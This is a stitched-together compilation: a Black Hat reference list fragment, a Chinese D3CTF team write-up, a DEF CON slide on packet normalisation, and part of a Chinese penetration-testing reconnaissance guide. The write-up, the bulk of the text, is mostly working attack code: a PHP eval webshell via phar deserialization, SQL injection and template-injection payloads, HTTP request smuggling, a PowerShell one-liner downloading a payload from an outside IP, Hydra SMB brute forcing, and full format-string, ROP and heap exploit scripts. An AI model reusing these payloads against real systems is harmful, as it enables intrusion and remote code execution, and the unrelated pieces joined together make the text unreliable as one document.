07/Byrne/Presentation/bh-usa-07-byrne.pdf
Anti-DNS Pinning Demo
http://www.jumperz.net/index.php?i=2&a=3&b=3
References
Same Origin Policy
http://en.wikipedia.org/wiki/Same_origin_policy
RFC 1122
http://www.faqs.org/rfcs/rfc1122.html
Loopback and Multi-Homed Routing Flaw
http://seclists.org/bugtraq/2001/Mar/42
TCP/IP Illustrated Volume 2, W. Richard Stevens
p. 218 – 219 | pdf |
D3CTF Writeup
1
D3CTF Writeup
Author:Nu1L
Web
ezupload
先写htaccess让他可以执⾏脚本
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------030808716877952631606047
User-Agent: PostmanRuntime/7.20.1
Accept: */*
Cache-Control: no-cache
Postman-Token: aeee478c-f649-433f-b007-6799bb3db9f2
Host: cdc673a649.ezupload.d3ctf.io
Accept-Encoding: gzip, deflate
Content-Length: 443
Connection: close
----------------------------030808716877952631606047
Content-Disposition: form-data; name="action"
upload
----------------------------030808716877952631606047
Content-Disposition: form-data; name="url"
data:image/png;base64,QWRkSGFuZGxlciBwaHA3LXNjcmlwdCAudHh0
----------------------------030808716877952631606047
Content-Disposition: form-data; name="filename"
.htaccess
----------------------------030808716877952631606047--
再反序列化往⽂件⾥写jio本
先找⽬录
<?php
$d1 = new dir("test", "testdd");
$d1->userdir = '../';
$d2 = new dir("url", "filename");
$d2->filename = "upload/3535fc06ad2b768f8f2f752376f94f14/test3";
$d2->userdir = $d1;
// echo serialize($d2);
$phar = new Phar("1.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"." __HALT_COMPILER(); ");
// 增加gif⽂件头
$phar->setMetadata($d2);
Web
ezupload
ezts
easyweb
fake onelinephp
Showhub
Pwn
knote
unprintableV
new_heap
RE
Ancient Game V2
Crypto
babyecc
sign2win
D3CTF Writeup
2
$phar->addFromString("test.jpg","test");
$phar->stopBuffering();
这⾥为了绕过内容检测, 把phar压缩(⽤gzip)了⼀下
触发
然后再写个脚本, 写txt, 放webshell, 还是为了绕过检测, 压缩了⼀下
<?php
$d3 = new dir("test", "testdd");
$d3->userdir = '<?php eval($_REQUEST[122]); phpinfo();';
$d3->filename = '/var/www/html/a57ecd54d4df7d99/upload/3535fc06ad2b768f8f2f752376f94f14/test3';
$phar = new Phar("2.phar");
$phar->startBuffering();
$phar->setStub("GIF89a"." __HALT_COMPILER(); ");
D3CTF Writeup
3
// 增加gif⽂件头
$phar->setMetadata($d3);
$phar->addFromString("test.jpg","test");
$phar->stopBuffering();
phpinfo 发现 open_basedir=/var/www/html
绕过+查看 = get flag
ini_set('open_basedir', '..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
chdir('..');
D3CTF Writeup
4
chdir('..');
ini_set('open_basedir', '/');
var_dump(scandir('/'));
echo file_get_contents('F1aG_1s_H4r4');
// d3ctf{C0n9rAtul4t1ons_Y0u_9ot_1t}
创新点:
htaccess的addhandler 不⽌application/x-httpd-php
ezts
KOA框架https://github.com/koajs/koa
https://github.com/d-band/koa-orm
找到是这个库, 然后去做注⼊.
http://df8aea7e00.ezts.d3ctf.io/search?key=1'BB%20or%20AA%271&value=1
http://df8aea7e00.ezts.d3ctf.io/search?key=1'BB%20or%201%23&value=1
http://df8aea7e00.ezts.d3ctf.io/search?key=1'BB%20or%20(ascii(substr((select%20version()),1,1BB%3E10B%23&value=1
写脚本跑出
admin 47ada0f1c8e3d8c3
原型链污染
后台登上去, 随便给那个⽤⼾设置个data
{"constructor":{"prototype":{"outputFunctionName":"a; return global.process.mainModule.constructor._load('child_process').execS
/flag 是root 400权限, 现在是node⽤⼾, 需要提取
D3CTF Writeup
5
Linux 8c6231193dc6 4.15.0-54-generic #58-Ubuntu SMP Mon Jun 24 10:55:24 UTC 2019 x86_64 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 9.11 (stretch)
Release: 9.11
Codename: stretch
$ gcc --version
gcc (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
$ ldd --version
ldd (Debian GLIBC 2.24-11+deb9u4) 2.24
CVEZ2019Z14287
easyweb
admin admin
Hi, admin, hope you have a good experience in this ctf gameyou must get a RCE Bug in this challenge
⽂档:https://codeigniter.org.cn/user_guide/general/controllers.html
// controllers/user.php
public function index()
{
if ($this->session->has_userdata('userId')) {
$userView = $this->Render_model->get_view($this->session->userId);
$prouserView = 'data:,' . $userView;
$this->username = array('username' => $this->getUsername($this->session->userId));
$this->ci_smarty->assign('username', $this->username);
$this->ci_smarty->display($prouserView);
} else {
redirect('/user/login');
}
}
// models/render_model.php
public function get_view($userId){
$res = $this->db->query("SELECT username FROM userTable WHERE userId='$userId'")->result();
if($res){
$username = $res[0]->username;
$username = $this->sql_safe($username);
$username = $this->safe_render($username);
$userView = $this->db->query("SELECT userView FROM userRender WHERE username='$username'")->result();
$userView = $userView[0]->userView;
return $userView;
}else{
return false;
}
}
private function safe_render($username){
D3CTF Writeup
6
$username = str_replace(array('{','}'),'',$username);
return $username;
}
private function sql_safe($sql){
if(preg_match('/and|or|order|delete|select|union|load_file|updatexml|\(|extractvalue|\)/i',$sql)){
return '';
}else{
return $sql;
}
}
在sql payload⾥⾯加上{ } 绕过sql_safe 然后渲染模板..
testuser123' uni{on sel{ect 06c616c616c61 limit 1,1 -- -
public function index()
{
if ($this->session->has_userdata('userId')) {
$userView = $this->Render_model->get_view($this->session->userId);
$prouserView = 'data:,' . $userView;
$this->username = array('username' => $this->getUsername($this->session->userId));
$this->ci_smarty->assign('username', $this->username);
$this->ci_smarty->display($prouserView);
} else {
redirect('/user/login');
}
}
https://www.smarty.net/docs/zh_CN/index.tpl
select hex('EE$smarty.version}}')
123' unio{n se{lect 07B7B24736D617274792E76657273696F6E7D7D limit 1,1 —
还要逃逸沙箱
函数⽩名单:
public $php_functions = array('isset', 'empty', 'count', 'sizeof', 'in_array', 'is_array', 'time',);
估计要⽤内置⽅法Orz
D3CTF Writeup
7
D3CTF Writeup
8
123' unio{n se{lect
07B7B7068707D7D696E636C75646528272F746D702F64643861656634666635656566383462356232363262653
limit 1,1 —
使⽤{php}标签⽂件包含上传的Webshell,即可绕过沙箱。
⾮预期
d3ctf{Th4at's_A_Si11y_P0p_chi4n}
fake onelinephp
.git泄漏,拖出来是两个⽂件:1. hint1.txt 2. index.php
hint1.txt:
GitHack?
Naiiiive!
index.php:
对但是,现在访问不到=。= 404
刷新了三次,⼀次是404,⼀次是502,⼀次能正常执⾏highlight_file,所以是啥feature吗。
对。。这是要⼲啥。。。
估计是防⽌条件竞争吧,不让⽤原解
D3CTF Writeup
9
还有其他 .git
dict.txt
10.23 🌞
👴记忆⼒不好,所以👴把密码藏这⾥的某⼀⾏,👴只需要记住⼀个⾏号就可以了,但是你不⾏:)
Still I can't remember my longlonglong password,
so I created a dictionary to hide my password (you are looking right at it).
Now a line number is all I need to remember to retrieve my password, while you can't =w=
Nx9MEEAcWUt6PrS
mB5cvz9U0lolxel
8NrWdcUvbABVraV
HEjSwTpsJZclu8M
Cn0rQ7dxJuW3vBQ
......
hint2.txt
10.24 🌧
这台💻跑着web服务,为了防⽌⼤⿊阔⽤nginx 0day⿊我电脑拿flag,👴把flag放到了内⽹的💻上(172.19.97.8 C:\Users\Administrator\Desktop\flag.txt
虽然👴记忆⼒不好,⼀个密码⾛天下,难道你们⿊阔还能盗我号🌶?
In case you H4ck3rs use nginx 0day to pwn this computer, I put the flag on
172.19.97.8 C:\Users\Administrator\Desktop\flag.txt
I'm not good at remembering passwords, so all my passwords are the same.
I doubt that you can ever find the password, so I'm all good, I think.
直接上Cobalt Strike,stageless payload选择powershell,将其Host 到C2上,然后⽤psh下载执⾏即可绕过AV。
system("powershell.exe -nop -w hidden -c \"IEX ((new-object
net.webclient).downloadstring('http://47.95.251.134{8080/download/file.ps1'))\"");
然后打包上传Hydra,将Hint中得密码⽣成字典,对本地SMB服务爆破
hydra -l w1nd-P pass.txt smb://172.19.97.4
D3CTF Writeup
10
爆破获得密码后即可Make Token,拿下第⼆台机器权限。
make_token .\administrator eDHU27TlY6ugslV
shell type \\172.19.97.8\C$\Users\ADministrator\Desktop\flag.txt
D3CTF Writeup
11
d3ctf{Sh3ll_fr0m_ur1111_inc1ude!1!!!_soCoooool}
Showhub
Description
Showhub is a fashion-focused community built on a self-developed framework.Download this framework here
Notice:scanner is useless
Challenge Address
http://ec057b43d9.showhub.d3ctf.io
注册时sql语句使⽤sprintf拼接,可以利⽤ %1$\' 格式化出⼀个单引号,从⽽导致insert注⼊
D3CTF Writeup
12
smi1e12345%1$',%1$'4a451ff953e28b3ba4f366ab2147ce99e8a3254502f53bda1bc578dfece79c6c%1$')#
smi1e12345 smi1esmi1e 登陆
smi1e123%1$',(if(1,sleep(3),1)))# 可以盲注,但是admin密码是sha256加密的 注出来并没有⽤
所以只能想办法改掉admin密码,这⾥利⽤ ON DUPLICATE KEY UPDATE ,当insert已经存在的记录时,执⾏Update
⽤下⾯的当⽤⼾名, 密码随便, 注册
admin%1$',%1$'password%1$') ON DUPLICATE KEY UPDATE password=%1$'7e6e0c3079a08c5cc6036789b57e951f65f82383913ba1a49ae992544f1b4b
然后就能改admin密码了, admin testpass123
登陆进去后要求客⼾端的来源ip为内⽹ip,试了各种伪造ip的请求头都不⾏
然后发现 Server: ATS/7.1.2 ,搜了下发现这个版本存在请求⾛私
https://mengsec.com/2019/10/10/http-request-smugging/
然后发现⽂章中的测试环境跟题⽬的很像
最后利⽤CLZTE完成请求⾛私
POST / HTTP/1.1
Host: [ec057b43d9.showhub.d3ctf.io](http://ec057b43d9.showhub.d3ctf.io/)
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=uaoq5ec3gnqtadteh4ejf1pdt8§§
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 658
Transfer-Encoding: chunked
0
POST /WebConsole/exec HTTP/1.1
Host: [ec057b43d9.showhub.d3ctf.io](http://ec057b43d9.showhub.d3ctf.io/)
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: [http://ec057b43d9.showhub.d3ctf.io/WebConsole/](http://ec057b43d9.showhub.d3ctf.io/WebConsole/)
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,zh-TW;q=0.6
Cookie: PHPSESSID=uaoq5ec3gnqtadteh4ejf1pdt8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
cmd=cat+/flag&a=
D3CTF Writeup
13
Pwn
knote
全盘rwx....
/ $ rm /bin/umount
rm /bin/umount
/ $ echo '#!/bin/sh' > /bin/umount
echo '#!/bin/sh' > /bi[ 23.319387] random: fast init done
n/umount
/ $ echo '/bin/sh' >> /bin/umount
echo '/bin/sh' >> /bin/umount
/ $ chmod +x /bin/umount
chmod +x /bin/umount
/ $ exit
exit
/bin/sh: can't access tty; job control turned off
/ # cat /flag
cat /flag
d3ctf{mutli_thread_JO00p_Ro0op}/ #
D3CTF Writeup
14
unprintableV
栈上可以做printf的那个链 然后栈任意写
栈布局刚好可以做csu_init
r12是bss段的.....stdin在bss上.....⼤概可以整出来⼀个open ?
可以把stdout指针改成stderr打出来
from pwn import *
#p = process('./unprintableV')
p = remote('212.64.44.87', 12604)
p.recvuntil('here is my gift: 0x')
stack = int(p.recv(12),16)
print hex(stack)
p.recvuntil('may you enjoy my printf test!')
buf_ptr = stack
pay1 = "%"+str(buf_ptr&0xff)+"c%6$hhn"
print pay1
p.send(pay1.ljust(300,'\x00'))
pay2 = "%32c%10$hhn"
p.send(pay2.ljust(300,'\x00'))
pay3 = "%1664c%9$hn"
p.send(pay3.ljust(300,'\x00'))
p.sendline("%15$p%14$p\x00")
p.recvuntil("0x")
addr = int(p.recv(12),16)
print hex(addr)
p.recvuntil("0x")
addr2 = int(p.recv(12),16)
print hex(addr2)
libc_base = addr - (0x7f73b7bddb97-0x7f73b7bbc000)
sh = libc_base +1785498
gets = libc_base + 524464
base = addr2 - (0x00055B74A2C6B60-0x00055B74A2C6000)
b_pop_rdi = base+0x0000000000000bc3
pop_rdi = libc_base + 0x000000000002155f
pop_rsi = libc_base + 0x0000000000023e6a
pop_rdx = libc_base + 0x0000000000001b96
pop_rcx = libc_base + 0x000000000003eb0b
pop_rax = libc_base + 0x00000000000439c8
syscall = libc_base + 0x00000000000d2975
pay4 = "%"+str((buf_ptr+0x18+1)&0xff)+"c%6$hhnHOMURA"
print pay4
p.send(pay4+'\x00\n')
p.recvuntil('HOMURA')
pay5 = "%"+str((buf_ptr >> 8)&0xff)+"c%10$hhnHOMURA"
p.send(pay5+'\x00\n')
D3CTF Writeup
15
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +1)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 8)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +2)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 16)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +3)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 24)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +4)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 32)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
pay6 = "%"+str((buf_ptr+0x20 +5)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((gets >> 40)&0xff)+"c%10$hhnHOMURA"
D3CTF Writeup
16
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
#gets ok
pay6 = "%"+str((buf_ptr+0x10)&0xff)+"c%6$hhnHOMURA"
p.send(pay6+'\x00\n')
p.recvuntil('HOMURA')
pay7 = "%"+str((195)&0xff)+"c%10$hhnHOMURA"
p.send(pay7+'\x00\n')
p.recvuntil('HOMURA')
last = 'd^3CTF'.ljust(0x10,'\x00')
last += "flag"
p.send(last.ljust(300,'\x00'))
#0x000000000002155f : pop rdi ; ret
#0x0000000000023e6a : pop rsi ; ret
#0x0000000000001b96 : pop rdx ; ret
#0x000000000003eb0b : pop rcx ; ret
#0x00000000000439c8 : pop rax ; ret
#0x00000000000d2975 : syscall ; ret
#0x0000000000155fc6 : pop r8 ; mov eax, 1 ; ret
pop_r8 = libc_base +0x0000000000155fc6
rop = p64(pop_rdi)
rop +=p64(base+0x202070)
rop +=p64(pop_rsi)
rop +=p64(0)
rop +=p64(pop_rdx)
rop +=p64(0)
rop +=p64(pop_rax)
rop +=p64(2)
rop +=p64(syscall)
#open
rop +=p64(pop_rdi)
rop +=p64(1)
rop +=p64(pop_rsi)
rop +=p64(base+0x202080)
rop +=p64(pop_rdx)
rop +=p64(100)
rop +=p64(pop_rax)
rop +=p64(0)
rop +=p64(syscall)
#read
rop +=p64(pop_rdi)
rop +=p64(2)
rop +=p64(pop_rsi)
rop +=p64(base+0x202080)
rop +=p64(pop_rdx)
rop +=p64(100)
rop +=p64(pop_rax)
rop +=p64(1)
rop +=p64(syscall)
#write
p.sendline('a'*24+rop)
p.interactive()
new_heap
getchar() 会申请01000的chunk
from pwn import *
ru = lambda x: p.recvuntil(x, drop = True)
sa = lambda x,y: p.sendafter(x,y)
sla = lambda x,y: p.sendlineafter(x,y)
D3CTF Writeup
17
def alloc(size,cnt):
sa("3.exit\n",str(1).ljust(0x7,'\x00'))
sa("size:",str(size).ljust(0x7,'\x00'))
sa("content:",cnt)
def free(idx):
sa("3.exit\n",str(2).ljust(0x7,'\x00'))
sa("index:",str(idx).ljust(0x7,'\x00'))
ru("done\n")
def qu(byte):
sa("3.exit\n",str(3).ljust(0x7,'\x00'))
sa("sure?\n",byte)
def exp():
try:
global p
# p = process("./new_heap",env={"LD_PRELOAD":"./libc.so.6"})
HOST,PORT = '49.235.24.33','20201'
p = remote(HOST,PORT)
libc = ELF("./libc.so.6")
ru("friends:0x")
byte = int(ru('\n'),16)-0x2
log.info('byte:'+hex(byte))
alloc(0x78,'0'*0x78)
alloc(0x78,'1'*0x78)
alloc(0x78,'2'*0x78)
alloc(0x78,'3'*0x78) #3
alloc(0x78,'\x00'*0x58+p64(0x81)) #5
alloc(0x38,'5'*0x38) #5
alloc(0x78,'\x00'*0x18+p64(0x61)) #7
alloc(0x78,'7'*0x70) #8
alloc(0x78,'8'*0x70) #8
free(0)
free(1)
free(2)
free(3)
free(4)
free(6)
free(7)
free(8)
alloc(0x78,'\x00'*0x28+p64(0x51)) #10
free(8)
alloc(0x78,'\xb0'+chr(byte+0x4)) #11
ru("done\n")
qu('\xe1')
free(5)
alloc(0x18,'x'*0x18) #12
ru("done\n")
alloc(0x8,'\x50\x77') #13
ru("done\n")
alloc(0x38,'\n') #14
ru("done\n")
alloc(0x38,2*p64(0)+p64(0xfbad1800)+p64(0)*3+p8(0)) #15
p.recv(8)
libc.address = u64(p.recv(8))-0x3b5890
log.info("libc.address:"+hex(libc.address))
system = libc.sym['system']
if libc.address<0x700000000000 or libc.address>0x800000000000:
return
p.close()
log.info('system:'+hex(system))
__free_hook = libc.sym['__free_hook']
log.info('__free_hook:'+hex(__free_hook))
ru("done\n")
sla("size:",str(0x38))
sa("content:",3*p64(0)+p64(0x81)+p64(libc.sym['__free_hook']))
ru("done\n")
p.sendline(str(1))
sla("size:",str(0x78))
sa("content:","/bin/sh\x00")
ru("done\n")
p.sendline(str(1))
sla("size:",str(0x78))
sa("content:",p64(libc.sym['system']))
ru("done\n")
p.sendline(str(2))
sla("index:",str(16))
D3CTF Writeup
18
p.interactive()
except EOFError:
return
if __name__ == "__main__":
'''
1/16
d3ctf{nEW-p@Rad!se-but-noT_pERfeCT}
'''
while True:
exp()
p.close()
RE
Ancient Game V2
https://d3ctf-rev-1256301804.cos.ap-shanghai.myqcloud.com/dddb4cc54c/chall_2d7cf6eb61.html
程序第⼀步把输⼊和t做了fun函数实现的运算,t和flag似乎很接近...
t = [98, 52, 96, 118, 98, 122, 80, 118, 32, 53, 106, 82, 68, 98, 121, 93, 64, 64, 125, 89, 114, 121, 125,
71, 122, 55, 54, 74, 51, 74, 51, 55, 52, 54, 79, 51, 98, 48, 109, 96, 58, 71, 99, 50, 71, 58, 102,
def nand(a, b):
return ~(a & b)
def fun(a, b):
t1 = nand(b, b)
t2 = nand(a, t1)
t3 = nand(a, a)
t4 = nand(b, t3)
return nand(t4, t2)
⼿动把nand符号化⼀下
function nand(a, b){
if(a === b)
{
if(typeof(a) == "string")
{
return '~' + a;
}
else
{
return ~a;
}
}
if(typeof(a) == "string")
{
return 'nand(' + a + ',' + b + ')';
}
if(typeof(b) == "string")
{
return 'nand(' + a + ',' + b + ')';
}
return ~(a & b);
}
可以看到后⾯的判断
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-1),nand(0,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-2),nand(1,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-3),nand(2,~nand(nand(input0,-99),nand(98,~input0))))
0
D3CTF Writeup
19
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-4),nand(3,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-5),nand(4,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-6),nand(5,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-7),nand(6,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-8),nand(7,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-9),nand(8,~nand(nand(input0,-99),nand(98,~input0))))
0
cmp nand(nand(nand(nand(input0,-99),nand(98,~input0)),-10),nand(9,~nand(nand(input0,-99),nand(98,~input0))))
0
猜测是判断input0进⾏判断,其中所使⽤的数字就是之前提取出来的表⾥的数字
input0按照flag格式应该是'd',对应的(结果,序号):
(6, 0)
(7, 1)
(4, 2)
(5, 3)
(2, 4)
(3, 5)
(0, 6)
(1, 7)
(14, 8)
(15, 9)
如果令t0 = nand(nand(input0,Z99B,nand(98,~input0BB
这个神秘判断就可以看作是判断t0是否是数字A0Z9B
猜测是经过前⾯的fun(a, b)之后需要在0Z9这个范围
按照这个规律化简第⼀个表达式可得:
~nand(nand(nand(t3,Z9B,nand(8,~t3BB,2147483647B
经过测试就是在判断t38
于是乎前⾯的⼀系列神秘判断可以看做是在判断不相等的东西
提取出后直接⽤z3求解得:
t[28] = 8
t[3] = 2
t[5] = 1
t[15] = 9
t[6] = 5
t[0] = 6
t[14] = 7
t[7] = 8
t[16] = 8
t[33] = 4
t[40] = 3
t[41] = 2
t[31] = 1
t[2] = 3
t[39] = 9
t[4] = 4
t[46] = 8
t[49] = 3
t[8] = 4
t[24] = 2
t[37] = 1
t[9] = 5
t[18] = 3
t[35] = 6
t[12] = 1
t[20] = 7
t[21] = 3
t[25] = 4
t[17] = 5
D3CTF Writeup
20
t[26] = 1
t[44] = 4
t[48] = 7
t[1] = 7
t[23] = 5
t[30] = 9
t[43] = 2
t[47] = 5
t[32] = 3
t[45] = 6
t[42] = 8
t[19] = 9
t[34] = 3
t[36] = 4
t[22] = 7
t[13] = 6
t[11] = 4
t[27] = 6
t[38] = 9
t[29] = 6
t[10] = 6
之后逐位求出来即可
res = ''
en1 =[98, 52, 96, 118, 98, 122, 80, 118, 32, 53, 106, 82, 68, 98, 121, 93, 64, 64, 125, 89, 114, 121, 125, 105, 71, 122, 55, 54
for i in xrange(50):
for sinput in xrange(0,0x80):
if nand(nand(sinput,~en1[i]),nand(en1[i],~sinput)) == t[i]:
res += chr(sinput)
break
print(res)
Crypto
babyecc
#!/usr/bin/env sage
N = 45260503363096543257148754436078556651964647703211673455989123897551066957489
p, q = 136974486394291891696342702324169727113, 330430173928965171697344693604119928553
assert p * q == N
# Carmichael's theorem
A = 84095692866856349150465790161000714096047844577928036285412413565748251721 + euler_phi(pow(2, 253)) / 2
P = (44159955648066599253108832100718688457814511348998606527321393400875787217987,
41184996991123419479625482964987363317909362431622777407043171585119451045333)
Q = (8608321574287117012150053529115367767874584426773590102307533765044925731687,
42087968356933334075391403575576162703959415832753648600254008495577856485852)
A = A % N
F = Zmod(N)
B = F(P[1] ^ 2 - P[0] ^ 3 - A * P[0])
E = EllipticCurve(F, [A, B])
# Solve by isomorphism
Pk = E(P)
Qk = E(Q)
Fp = GF(p)
Fq = GF(q)
Ep = EllipticCurve(Fp, [A, B])
Eq = EllipticCurve(Fq, [A, B])
Qp = Ep(Q)
Pp = Ep(P)
Qq = Eq(Q)
Pq = Eq(P)
a = Pp.discrete_log(Qp)
b = Pq.discrete_log(Qq)
op = Ep.order()
oq = Eq.order()
m = crt(a, b, op / gcd(op, oq), oq / gcd(op, oq))
print m, hex(m).decode('hex')
D3CTF Writeup
21
sign2win
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
import ecdsa, hashlib, binascii, gmpy2, random, itertools, string
m1 = 'I want the flag'.encode()
m2 = 'I hate the flag'.encode()
curve = ecdsa.curves.SECP256k1
G = curve.generator
n = curve.order
hexlify = binascii.hexlify
# find a valid secret key
def H(m):
return int(binascii.hexlify(hashlib.sha256(m).digest()), 16)
z1 = H(m1)
z2 = H(m2)
k = random.randint(1, n - 1)
r = (G * k).x()
d = (((-(z1 + z2)) % n) * gmpy2.invert((2 * r) % n, n)) % n
sk = ecdsa.SigningKey.from_secret_exponent(d, curve, hashfunc=hashlib.sha256)
vk = sk.get_verifying_key()
assert (z1 + z2 + 2 * r * d) % n == 0
r0, s0 = ecdsa.util.sigdecode_string(sk.sign(m1, k=k), n)
r1, s1 = ecdsa.util.sigdecode_string(sk.sign(m2, k=k), n)
assert (-s1) % n == s0
pubkey = vk.to_string()
sig = sk.sign(m1, k=k)
context.log_level = 'DEBUG'
p = remote('129.226.163.141', 12233)
def PoW(chal, h):
for comb in itertools.product(string.ascii_letters + string.digits, repeat=4):
if hashlib.sha256((''.join(comb) + chal).encode('utf-8')).hexdigest() == h:
return ''.join(comb)
raise Exception("Not found")
p.recvuntil(b'XXXX+')
chal = p.recvuntil(')', drop=True).decode()
p.recvuntil(b' == ')
h = p.recvline().decode().strip()
w = PoW(chal, h)
p.recvuntil(b'XXXX:')
p.sendline(w.encode())
p.sendline(b'2')
p.recvuntil(b'encode)\n')
p.sendline(hexlify(pubkey))
p.sendline(b'5')
p.recvuntil(b'signature\n')
p.sendline(hexlify(sig))
p.recvuntil(b'signature\n')
p.sendline(hexlify(sig))
p.interactive() | pdf |
Transformations
Defcon
21
IPv4
IP ID Randomization
o
Exclude Fragments
o
Others … Randomize and Clear Outgoing “DF”
TTL Standardized
o
Exclude ICMP Echo Requests and Routing Protocols (RIP, BGP)
o
Others … Accounting for Hops Already Traveled
o
Recalibrate for Maximum Allowed
ToS Cleared
ECN Cleared
IPv6
Hop Limit Standardized
o
Exclude ICMP Echo Requests and Routing Protocols (RIP, BGP)
o
Others … Accounting for Hops Already Traveled
o
Recalibrate for Maximum Allowed
Traffic Class Cleared
TCP
Discard Aberrant Flag Combinations (Enforce Strict “RFC” for all TCP flag combinations)
o
“Null”
o
“Christmas Tree”
o
SYN, FIN, ACK
o
Etc …
TCP Option Standardization
o
Parameters – MSS, Window, SACK, and MD5 Only
o
Values - Original
o
Order – MSS, Window, SACK, and MD5 (if present)
o
Padding – NOP till the end of original length
URG Flag and URG Pointer Cleared | pdf |
任意文件下载击溃跳板站点
这次的实战渗透过程,信息收集是很重要的一个阶段。尽可能收集目标网站或目标主机尽量多的信
息。信息收集的方式:
主动信息收集是通过直接访问网站主动获取信息,对IP开放的端口、CMS、中间件、敏感目
录、敏感文件、脚本类型、JS里的域名、操作系统扫描分析。
被动信息收集是基于公开的渠道,在不与目标系统直接交互的情况下获取信息,比如搜索引擎
获取网站的URI、获取IP绑定的域名、C段、域名whois信息、证书对应的其他资产做扩展信息收
集。
常用的几个小技巧:
1)利用windows和linux区分大小写的区别,在访问的时候尝试把路径部分改成大写,
https://www.aaa.com/upload/index.php改成www.aaa.com/upload/index.PHP。
页面路径还正常访问就是Windows系统,报错就是Linux系统。
因为Windows系统对文件名称大小写不敏感,而Linux对文件名称大小写会有区分。
2)chrome的F12扩展查看网络 ‐‐> header ‐‐> Server部分,例如:Server: nginx/1.20.1可以知道是
nginx
3)判断网站是php 、Jsp 、Asp 、Aspx。可以根据网站URL来判断,也可以利用google语法辅助
判断,site:XXX filetype:asp|php|jsp|jspx|aspx
端口扫描
HTTP端口快速扫描使用masscan扫描,nmap服务识别。常见端口:
21:"FTP",
22:"ssh",
25:"SMTP",
80:"web",
139:"Samba",
143:"IMAP",
161:"SNMP",
389:"Ldap目录访问协议",
443:"https",
445:"Microsoft SMB",
465:"SMTP SSL",
513:"rlogin",
546:"DHCP failover",
873:"rsync",
993:"IMAPS",
1080:"socks proxy",
1194:"OpenVPN",
1352:"Lotus domino",
1433:"MSSQL",
1521:"Oracle default",
2049:"Nfs",
2181:"ZooKeeper",
2375:"Docker",
3306:"MySQL",
3389:"Remote Desktop",
4440:"rundeck",
4848:"GlassFish控制台",
5000:"SysBase/DB2",
5432:"PostgreSQL",
5632:"pcanywhere",
5900:"vnc",
5984:"Apache CouchDB",
6082:"varnish",
6984:"Apache CouchDB SSL",
6379:"Redis",
7001:"weblogic_Server isten port",
7002:"Server Listen SSL Port",
8069:"zabbix",
8080:"web,jboss,tomcat etc..",
8089:"Jboss/Tomcat/Resin",
8083:"influxDB Web admin",
8086:"influxdb HTTP API",
8095:"Atlassian Crowd",
8161:"activemq",
8888:"Jupyter Notebook",
8983:"solr",
9000:"fastcgi",
9043:"VMware ESXI vsphere",
9080:"websphere http",
9083:"Hive default",
9090:"websphere admin",
9200:"Elsaticsearch http",
9300:"Elsaticsearch Node1",
10000:"HiveServer2",
11211:"memcached",
27017:"MongoDB",
28017:"MongoDB web page"
50000:"SAP command excute",
50060:"hadoop web",
50070:"hadoop default",
60000:"HBase Master",
